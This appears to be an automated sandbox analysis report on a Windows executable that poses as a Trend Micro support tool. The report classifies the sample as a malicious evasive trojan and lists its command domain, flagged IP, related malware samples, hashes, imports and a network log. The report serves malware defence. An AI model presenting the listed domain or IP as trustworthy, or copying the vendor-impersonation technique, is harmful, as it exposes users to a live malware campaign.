              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/describenrdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeOrdD2B4MLXl.exe, 00000000.00000003.1950173074.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeSLrdD2B4MLXl.exe, 00000000.00000003.3504018969.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743703440.000001CBFE1C8000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274577635.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3050891612.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/0rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.1950257094.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.winimage.com/zLibDllrdD2B4MLXl.exefalse
                high
                https://cysdetred-support.com/services/data/v36.0/sobjects/account/describexrdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3050891612.000001CBFE1C0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.winimage.com/zLibDll1.2.11rdD2B4MLXl.exefalse
                • Avira URL Cloud: safe
                unknown
                https://cysdetred-support.com/services/data/v36.0/sobjects/account/describezrdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeBrdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://cysdetred-support.com/rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.1950257094.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743913036.000001CBFE16C000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE178000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE16C000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe6;rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE12A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                3.69.83.191
                cysdetred-support.comUnited States
                16509AMAZON-02UStrue
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1624117
                Start date and time:2025-02-25 21:38:30 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 39s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rdD2B4MLXl.exe
                renamed because original name is a hash value
                Original Sample Name:2cee710e6e9aa9984b810218533fa11080885c70.exe
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@1/0@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 2.23.77.188, 4.175.87.197, 13.107.246.60
                • Excluded domains from analysis (whitelisted): cac-ocsp.digicert.com.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, e3913.cd.akamaiedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                bg.microsoft.map.fastly.netPlay_VM-NowNewmexortho.htmlGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                01#U8be2#U4ef7#U91c7#U8d2d#U9080#U8bf7#U4e66.docGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                01#U8be2#U4ef7#U91c7#U8d2d#U9080#U8bf7#U4e66.docGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                Swift.exeGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                SecuriteInfo.com.Trojan.Siggen21.26995.5737.8153.exeGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                Goldsboro Housing Authority-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                • 199.232.210.172
                27#U0646.batGet hashmaliciousAsyncRATBrowse
                • 199.232.214.172
                fumot.batGet hashmaliciousQuasarBrowse
                • 199.232.214.172
                sspers.dll.dllGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                svchost (2).batGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AMAZON-02UShttps://singer.action.azurecomm.net/api/v2/a/c?url=https%3A%2F%2Fprimevoicemansvoiceoverman.digirooz.com%2Fprime%2F&d=AIAADZOGOFB5H3F6VAYSTY2RTESGNF4JC3XPM4OEYQFYF7347AHAEGEATXGCCH5LORIDNXKZLYYZP4UTMO76R2WADMFYXADRAAB4ZQOHL575R7PM7KDLDWNB3UJ4MSZLJG4JLNNXLP6JJLVVESIL57K5KI3ZFHOZ2LGSPAAF3YPOEPNVQPHYX47IY3SSCT6UDOD2FSXSSQJS2LASCLLELKNDZUPPD5TMOV4O26N254AREGQVH2CYVCFPZYBQ4L6N5S7Y6TZJH6AR6WAXCOJ6QIUZW2VVDGY&i=AIAADSTZZTG42BVN53FA4IIDAWLNZDAI7C63R3GCJSJZKAJOGXCECDE5HGLB4TIIBDVTOIXOMYJX7CAMYZK52ZT3Z2C2KXGLKKZ2DDMLRLRJE2AZ66ZZ5YANHGNZRSKARPF5VKEYHLOSFLEYRRWRL7RPNWS2TFYZZ574TXSSJIP6M2Q35NCINXYJGR4MPZDWBX6TG4WFQXOEREATPMNJHHNGG2QJBN3MWB5LZ673LSXTOPHJV6ZS5CFVZSWSVXHWJEW3POGL42453OH754X43XIXRB6GCET5DQEGVPTG7PJ5575AIQAIEXB4LZYUUCCPRMWRKC5PST7Z6RQEQY&s=AAEBSN7GK2HKHA5FDCIBYUGQUALPI6FG74BMXJ3QYPANRR7MXEYQGet hashmaliciousUnknownBrowse
                • 3.160.156.201
                REMITTANCE DETAILS....xlsxGet hashmaliciousHTMLPhisherBrowse
                • 18.245.33.131
                https://d2au43sm2agwgo.cloudfront.net/oDduMNTY?x=GsffcuBv1gkXTJcSslKrKC9ZX4d_3B9xLbZ2Qscge4SGw8HeiDlY1t16l4ZHdPmR7zUfQc3-e300_nv-vuX0pqFQQIjuCAGet hashmaliciousHTMLPhisherBrowse
                • 108.138.24.121
                hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 54.171.230.55
                hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 34.249.145.219
                hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 34.254.182.186
                lNV3432.emlGet hashmaliciousHTMLPhisherBrowse
                • 18.245.33.131
                res.mips.elfGet hashmaliciousUnknownBrowse
                • 13.248.177.203
                res.x86.elfGet hashmaliciousUnknownBrowse
                • 34.208.10.217
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Win32.AdwareX-gen.9554.24737.exeGet hashmaliciousXWormBrowse
                • 3.69.83.191
                raadnetankene.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 3.69.83.191
                176348758-8376475954.05.exeGet hashmaliciousGhostRatBrowse
                • 3.69.83.191
                crypted.exeGet hashmaliciousFormBookBrowse
                • 3.69.83.191
                Balance Pendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 3.69.83.191
                Patronne.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                • 3.69.83.191
                Payment Error Report.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                • 3.69.83.191
                confirmaci#U00f3n de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 3.69.83.191
                RFQ Supply QTN_Idx Middle East Trading LLC.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                • 3.69.83.191
                No context
                No created / dropped files found
                File type:PE32+ executable (GUI) x86-64, for MS Windows
                Entropy (8bit):6.948938787158752
                TrID:
                • Win64 Executable GUI (202006/5) 92.65%
                • Win64 Executable (generic) (12005/4) 5.51%
                • Generic Win/DOS Executable (2004/3) 0.92%
                • DOS Executable Generic (2002/1) 0.92%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:rdD2B4MLXl.exe
                File size:1'884'160 bytes
                MD5:11ee9190de7d96e509b14cd55c5dcdf1
                SHA1:2cee710e6e9aa9984b810218533fa11080885c70
                SHA256:6693465d15b4a4448c2937af6013acf5fc0a4932a55c46dda78defdeed5cea3d
                SHA512:77e5eb72420c9cf4a8a70a5f18713796b00c404635a0d97c919f70dd482ac783b896a5babd09453f62d5231d0e704ab80870ff5c606b37c9632c9ccaf2e62214
                SSDEEP:49152:5NQc7U0SgxsTA9zil8QTGT/2XLQhqxP1cN/tZmC:vXU0SisM9iHitz
                TLSH:9095AE0A67ED51E8D2B7D078C4A15A5AFAB2741847346ADF42D012491F33FE8DE3EB12
                File Content Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$.........b%...v...v...v...w...v...w...v...wi..v...v...v...v...v...v...v...w...v...w...v...w...v...w...v9..w...v...v...v...v...v9..w...
                Icon Hash:90cececece8e8eb0
                Entrypoint:0x14008819c
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x140000000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x6450C6E4 [Tue May 2 08:16:36 2023 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:4a36bdc0e9acb57b3de15b1c9077fb08
                Instruction
                dec eax
                sub esp, 28h
                call 00007F837CD120D8h
                dec eax
                add esp, 28h
                jmp 00007F837CD11757h
                int3
                int3
                dec eax
                mov eax, esp
                dec eax
                mov dword ptr [eax+18h], ebx
                dec eax
                mov dword ptr [eax+20h], esi
                dec eax
                mov dword ptr [eax+10h], edx
                dec eax
                mov dword ptr [eax+08h], ecx
                push edi
                inc ecx
                push esi
                inc ecx
                push edi
                dec eax
                sub esp, 30h
                dec ebp
                mov edi, ecx
                dec ebp
                mov esi, eax
                dec eax
                mov esi, edx
                dec eax
                mov edi, ecx
                xor ebx, ebx
                dec eax
                mov dword ptr [eax-20h], ebx
                mov byte ptr [eax-28h], bl
                dec ecx
                cmp ebx, esi
                je 00007F837CD11903h
                dec eax
                mov ecx, edi
                dec ecx
                mov eax, edi
                dec eax
                mov edx, dword ptr [000587CDh]
                call edx
                dec eax
                add edi, esi
                dec eax
                mov dword ptr [esp+50h], edi
                dec eax
                inc ebx
                dec eax
                mov dword ptr [esp+28h], ebx
                jmp 00007F837CD118BCh
                mov byte ptr [esp+20h], 00000001h
                dec eax
                mov ebx, dword ptr [esp+60h]
                dec eax
                mov esi, dword ptr [esp+68h]
                dec eax
                add esp, 30h
                inc ecx
                pop edi
                inc ecx
                pop esi
                pop edi
                ret
                dec eax
                mov eax, esp
                dec eax
                mov dword ptr [eax+08h], ebx
                dec eax
                mov dword ptr [eax+10h], ebp
                dec eax
                mov dword ptr [eax+18h], esi
                dec eax
                mov dword ptr [eax+20h], edi
                inc ecx
                push esi
                dec eax
                sub esp, 20h
                dec ecx
                mov ebx, dword ptr [ecx+38h]
                dec eax
                mov esi, edx
                dec ebp
                mov esi, eax
                dec eax
                mov ebp, ecx
                dec ecx
                mov edx, ecx
                dec eax
                mov ecx, esi
                dec ecx
                mov edi, ecx
                dec esp
                lea eax, dword ptr [ebx+04h]
                call 00007F837CD1148Dh
                mov eax, dword ptr [ebp+04h]
                and al, 66h
                neg al
                mov eax, 00000001h
                Programming Language:
                • [C++] VS2015 UPD3.1 build 24215
                • [IMP] VS2008 SP1 build 30729
                • [ C ] VS2015 UPD3.1 build 24215
                • [ASM] VS2015 UPD3 build 24213
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x12a8000x140.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x14d0000xf18.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x13e0000xd71c.pdata
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x14e0000x3438.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x11214c0x54.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x1123000x28.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1121a00x138.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xe00000x9b0.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xdefa50xdf000a66a279793add96d35aaa60d5c8a0354False0.4505062359865471data6.343793949291786IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0xe00000x4cad20x4cc008f942ce760096a7c41a5e64586ce0cf9False0.3718381005700326data5.079341680143342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x12d0000x1019c0x720004f1fc0e410777a6e6be42d48aa6ed34False0.12051123903508772data4.122764053596428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .pdata0x13e0000xd71c0xd800168271fc175a68d27e7aa44e757a9fb1False0.4433051215277778PEX Binary Archive5.751389690234424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                _RDATA0x14c0000xf40x200ff465f28bfbd93484d7f7d51083bc402False0.306640625data2.431409032399032IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x14d0000xf180x1000099150967efac80426cb5a3fca82e31cFalse0.333984375data5.207750131576838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x14e0000x8a4000x8a4004bb390476d9f49afe5e85e8c26230611False0.758718425067812data7.75419550208802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                TRENDOSCESALTVCRP0x14d1740x4dataEnglishUnited States3.0
                TREND_XBC_PACK0x14d1780x4dataChineseTaiwan3.0
                RT_VERSION0x14d17c0x450dataChineseTaiwan0.41032608695652173
                RT_MANIFEST0x14d5cc0x94cexported SGML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.31596638655462184
                DLLImport
                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                ADVAPI32.dllIsValidSid, OpenProcessToken, EqualSid, GetTokenInformation, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegQueryValueExA, RegSetValueExA, ImpersonateLoggedOnUser, RevertToSelf, LookupAccountSidW, CryptDeriveKey, CryptAcquireContextW, CreateWellKnownSid, RegCreateKeyExA, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptDecrypt, CryptEncrypt, CryptImportKey, CryptGetHashParam, CryptSetKeyParam, CryptDestroyKey, CryptReleaseContext, CryptAcquireContextA, RegOpenKeyExA
                SHLWAPI.dllPathRemoveFileSpecW, PathCanonicalizeW, PathStripPathW, PathFileExistsA, PathAppendW, PathFileExistsW
                RPCRT4.dllUuidToStringW, RpcStringFreeW
                WINHTTP.dllWinHttpQueryAuthSchemes, WinHttpSetCredentials, WinHttpReadData, WinHttpSetStatusCallback, WinHttpCrackUrl, WinHttpOpen, WinHttpCloseHandle, WinHttpConnect, WinHttpQueryDataAvailable, WinHttpQueryOption, WinHttpSetOption, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpQueryHeaders, WinHttpReceiveResponse, WinHttpSendRequest
                KERNEL32.dllFreeLibrary, LoadLibraryW, GetSystemDirectoryA, GetSystemDirectoryW, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, GetACP, LoadLibraryA, GlobalFree, OpenProcess, WTSGetActiveConsoleSessionId, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, DecodePointer, RaiseException, HeapDestroy, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, DeleteCriticalSection, DeleteFileA, GetTempPathA, GetTempFileNameA, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateFileA, WriteFile, LocalFree, GetCurrentDirectoryW, CreateDirectoryW, FileTimeToLocalFileTime, GetFileTime, GetTempFileNameW, LocalFileTimeToFileTime, SetFileTime, GetTempPathW, ReleaseMutex, WaitForSingleObject, WaitForSingleObjectEx, GetWindowsDirectoryW, CopyFileW, FileTimeToSystemTime, SystemTimeToFileTime, GetSystemTimeAsFileTime, GetCurrentProcessId, GetVersionExW, LoadLibraryExW, LoadResource, LockResource, SizeofResource, FindResourceW, WaitForMultipleObjects, GetExitCodeProcess, CreateProcessW, SystemTimeToTzSpecificLocalTime, MoveFileExW, TryEnterCriticalSection, InitializeSRWLock, QueryFullProcessImageNameA, OpenMutexA, GetSystemWow64DirectoryA, GetWindowsDirectoryA, GetSystemTime, ProcessIdToSessionId, TerminateThread, CreateThread, CreateMutexA, GetCurrentThreadId, GetModuleFileNameA, lstrlenA, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, CreateEventW, CreateMutexW, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, CloseHandle, GetModuleHandleA, GetProcAddress, GetSystemInfo, SwitchToThread, GetTickCount, GetModuleHandleW, GetVolumePathNamesForVolumeNameW, QueryDosDeviceW, GetLongPathNameW, GetDriveTypeA, FindVolumeClose, FindNextVolumeW, FindFirstVolumeW, FindFirstFileA, Sleep, RtlUnwind, ExitThread, FreeLibraryAndExitThread, CreateFileW, DeleteFileW, GetFileSizeEx, ReadFile, LocalAlloc, QueryFullProcessImageNameW, SetLastError, SetEvent, GetFileSize, CreateFileMappingA, GetLocalTime, GetVersionExA, ReleaseSemaphore, WaitForMultipleObjectsEx, CreateEventA, FormatMessageA, CreateSemaphoreA, GetStringTypeW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFinalPathNameByHandleW, SetEndOfFile, SetFileInformationByHandle, SetFilePointerEx, AreFileApisANSI, GetFileInformationByHandleEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EncodePointer, LCMapStringEx, GetCPInfo, InitializeSListHead, InitializeCriticalSectionAndSpinCount, ResetEvent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, OutputDebugStringW, InterlockedPushEntrySList, RtlPcToFileHeader, RtlUnwindEx, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetStdHandle, GetCommandLineA, GetCommandLineW, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadConsoleW, FindNextFileA, IsValidCodePage, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW, GetCurrentProcess, SetNamedPipeHandleState, WaitNamedPipeW, ConnectNamedPipe, DisconnectNamedPipe, CreateNamedPipeW, GetOverlappedResult, SetWaitableTimer
                SHELL32.dllSHGetFolderPathW
                ole32.dllCoUninitialize, CoCreateInstance, CoInitialize, CoInitializeEx, CoInitializeSecurity, CoCreateGuid
                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear, VariantInit
                CRYPT32.dllCryptProtectData, CryptUnprotectData, CryptSIPRetrieveSubjectGuidForCatalogFile, CryptMsgUpdate, CryptMsgOpenToDecode, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertGetCertificateChain, CryptQueryObject, CertGetNameStringW, CertFreeCertificateContext, CertFindCertificateInStore, CertCloseStore, CertOpenStore, CryptMsgControl, CryptMsgGetParam, CryptMsgClose, CryptDecodeObject
                WTSAPI32.dllWTSQueryUserToken
                urlmon.dllURLDownloadToFileA
                WINTRUST.dllWTHelperProvDataFromStateData, WTHelperGetProvCertFromChain, WTHelperGetProvSignerFromChain, WinVerifyTrust, CryptCATAdminAcquireContext, CryptCATAdminReleaseCatalogContext, CryptCATAdminEnumCatalogFromHash, CryptCATAdminCalcHashFromFileHandle, CryptCATCatalogInfoFromContext, CryptSIPGetSignedDataMsg, CryptSIPVerifyIndirectData, CryptCATAdminReleaseContext
                PSAPI.DLLEnumProcessModulesEx, GetModuleFileNameExA
                dbghelp.dllImageNtHeader
                DescriptionData
                CompanyNameTrend Micro Inc.
                CoverageBuildNone
                CompileOptionNone
                BuildTypeNone
                FileDescriptionTrend Micro Support Connector
                FileVersion14.0.0.12032
                LegalCopyrightCopyright (C) 2023 Trend Micro Incorporated. All rights reserved.
                LegalTrademarksCopyright (C) Trend Micro Inc.
                PrivateBuildBuild 12032 - None
                ProductNameTrend Micro Apex One
                ProductVersion14.0
                SpecialBuild12032
                Translation0x0409 0x04b0
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                ChineseTaiwan
                TimestampSource PortDest PortSource IPDest IP
                Feb 25, 2025 21:39:48.192840099 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:48.192898989 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:48.193073034 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:48.219880104 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:48.219904900 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:48.858477116 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:48.858685017 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:48.958728075 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:48.958751917 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:48.959223986 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:48.959289074 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:48.987776041 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:49.035334110 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:49.211757898 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:49.211852074 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:49.211870909 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:49.211916924 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:49.211956024 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:39:49.212009907 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:49.212929964 CET49736443192.168.2.43.69.83.191
                Feb 25, 2025 21:39:49.212946892 CET443497363.69.83.191192.168.2.4
                Feb 25, 2025 21:40:16.594017982 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:16.594065905 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:16.594165087 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:16.594460964 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:16.594482899 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.228167057 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.228322029 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.229075909 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.229094982 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.233023882 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.233038902 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.550631046 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.550721884 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.550755978 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.550797939 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:17.550821066 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.550851107 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.551177979 CET49737443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:17.551208019 CET443497373.69.83.191192.168.2.4
                Feb 25, 2025 21:40:41.465982914 CET49875443192.168.2.43.69.83.191
